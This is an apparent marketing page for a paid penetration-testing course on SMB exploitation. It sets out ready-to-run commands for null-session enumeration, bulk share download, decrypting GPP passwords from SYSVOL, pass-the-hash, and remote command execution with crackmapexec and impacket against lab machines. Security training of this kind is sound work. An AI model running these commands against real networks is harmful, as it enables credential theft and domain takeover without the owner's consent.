RatLabs
⭐ Premium Path · Protocol Exploitation

SMB Exploitation Mastery

Two modules. Null sessions to domain compromise. From listing shares without credentials to decrypting a GPP password out of SYSVOL — practised against live machines, not screenshots.

2Modules
3Machines
Premium
Get Started →

The SMB Attack Methodology

Four phases from first probe to domain controller compromise.

Phase 1 — Discovery

SMB runs on TCP 139 and 445. Identify the service, OS version, domain membership, and signing status in one scan.

nmap -sS -p 139,445 -sV \
  --script smb-os-discovery TARGET

Phase 2 — Null Session Enum

Before using any credentials, extract everything available to unauthenticated sessions: shares, users, password policy.

enum4linux-ng -A TARGET
smbclient -L //TARGET -N
crackmapexec smb TARGET

Phase 3 — Share Content Analysis

Download accessible share contents. Configuration files, backup archives, and scripts routinely contain credential material.

smbmap -H TARGET
smbclient //TARGET/SHARE -N
smb> mget *

Phase 4 — SYSVOL & Domain Exploitation

On domain controllers, walk SYSVOL for Groups.xml files. Decrypt GPP passwords with one command — then own the DC.

smbclient //TARGET/SYSVOL -N
# find Groups.xml → extract cpassword
gpp-decrypt <cpassword>
crackmapexec smb TARGET \
  -u USER -p PASS -x 'whoami'

The Two Modules

Complete Module 1 before Module 2. Each module has structured per-lab assignments.

Module 1 · 📂

SMB — Share Enumeration & Null Sessions

SMB is the most information-rich protocol on any Windows or Samba network. A single null session can reveal share names, usernames, password policies, and OS version — without a single credential. Master the tools and outputs before touching a password.

  • smbclient -L //TARGET -N (null session share list)
  • enum4linux -a TARGET (full automated null-session dump)
  • enum4linux-ng -A TARGET (modern Python rewrite, cleaner output)
  • crackmapexec smb TARGET (quick status, OS, signing, guest session)
  • nmap --script smb-enum-shares,smb-enum-users,smb-os-discovery TARGET
  • rpcclient -U '' -N TARGET → enumdomusers / querydominfo / srvinfo
  • Reading share permissions: READ vs WRITE, ACL inheritance, NETLOGON/SYSVOL presence
  • smbclient //TARGET/SHARE -N → ls → mget * (recursive share download)
Tools: smbclientenum4linuxenum4linux-ngcrackmapexecnmaprpcclient
CORP-DC01
🔒
Premium Content

Hands-on assignments for this module are available to Premium members.

⭐ Unlock Premium
Module 2 · 🗝️

SMB — SYSVOL, GPP & Domain Credential Harvest

Group Policy Preferences encrypted passwords with a key Microsoft published publicly in 2012 (MS14-025). Any domain user can read SYSVOL. Any attacker can decrypt the password with one command. This is not a theoretical risk — it still appears in modern environments.

  • Enumerating SYSVOL: smbclient //TARGET/SYSVOL -U DOMAIN/user%pass
  • Locating Groups.xml: find . -name Groups.xml 2>/dev/null
  • Extracting cpassword from Groups.xml (base64-encoded AES-256 blob)
  • Decrypting with gpp-decrypt: gpp-decrypt <cpassword>
  • CrackMapExec GPP auto-discovery: crackmapexec smb TARGET -u USER -p PASS -M gpp_password
  • Metasploit: post/multi/recon/local_exploit_suggester + auxiliary/scanner/smb/smb_ms17_010
  • Pass-the-Hash with crackmapexec: --hash LMHASH:NTHASH
  • impacket psexec.py / smbexec.py for remote command execution over SMB
Tools: smbclientgpp-decryptcrackmapexecimpacketmetasploit
CORP-DC01
🔒
Premium Content

Hands-on assignments for this module are available to Premium members.

⭐ Unlock Premium